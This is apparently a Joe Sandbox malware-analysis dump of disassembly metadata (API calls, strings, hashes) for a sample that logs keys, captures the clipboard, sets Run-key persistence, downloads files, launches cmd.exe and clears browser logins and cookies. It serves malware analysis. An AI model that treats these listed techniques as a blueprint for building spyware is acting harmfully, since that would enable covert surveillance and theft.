                                                                                                                                                                                      • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                                      • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                                                                                                                                                      • API String ID: 481472006-3277280411
                                                                                                                                                                                      • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                                                                                                                                                                      • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                                                                                                                                      • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0044C296
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0044C29D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 2336955059-263838557
                                                                                                                                                                                      • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                                                                                                                                                                      • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                                                                                                                                                                      • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                      • String ID: Connection Timeout
                                                                                                                                                                                      • API String ID: 2055531096-499159329
                                                                                                                                                                                      • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                                                                                                                                                                      • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                      • API String ID: 2005118841-1866435925
                                                                                                                                                                                      • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                                                                                                                                                                      • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,755737E0,?), ref: 0041384D
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,755737E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                      • API String ID: 1818849710-1051519024
                                                                                                                                                                                      • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                                                                                                                                      • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                                      • String ID: Control Panel\Desktop
                                                                                                                                                                                      • API String ID: 1818849710-27424756
                                                                                                                                                                                      • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                                                                                                      • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                                      • String ID: /C $cmd.exe$open
                                                                                                                                                                                      • API String ID: 587946157-3896048727
                                                                                                                                                                                      • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                                                                                                                                                                      • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                      • API String ID: 2574300362-1519888992
                                                                                                                                                                                      • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                                                                                                                                      • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                                                                                                                                      • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                      • API String ID: 3472027048-1236744412
                                                                                                                                                                                      • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                                                                                                                                                                      • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                                                                                                                                      • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                                                                                                                                                        • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                                                                                                                                        • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                      • String ID: [ $ ]
                                                                                                                                                                                      • API String ID: 3309952895-93608704
                                                                                                                                                                                      • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                                                                                                                                                                      • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3919263394-0
                                                                                                                                                                                      • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                                                                                                                                                                      • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                                                                                                                                      • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandleOpenProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 39102293-0
                                                                                                                                                                                      • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                                                                                                                                                                      • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                                                                                                                                      • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                                                                                                                                        • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                                                                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2633735394-0
                                                                                                                                                                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                      • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4116985748-0
                                                                                                                                                                                      • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                                      • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                                      • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Init_thread_footer__onexit
                                                                                                                                                                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                      • API String ID: 1881088180-3686566968
                                                                                                                                                                                      • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                                                                                                                                                                      • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                                                                                                                                      • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0044B804
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 442123175-263838557
                                                                                                                                                                                      • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                                                                                                                                                                      • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                                                                                                                                                                      • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0044B716
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 442123175-263838557
                                                                                                                                                                                      • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                                                                                                                                                                      • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                                                                                                                                                                      • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32 ref: 00416640
                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DownloadFileSleep
                                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                                      • API String ID: 1931167962-604454484
                                                                                                                                                                                      • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                                                                                                                                                                      • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                                                                                                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                      • String ID: Online Keylogger Stopped
                                                                                                                                                                                      • API String ID: 1623830855-1496645233
                                                                                                                                                                                      • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                                                                                                                                                                      • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
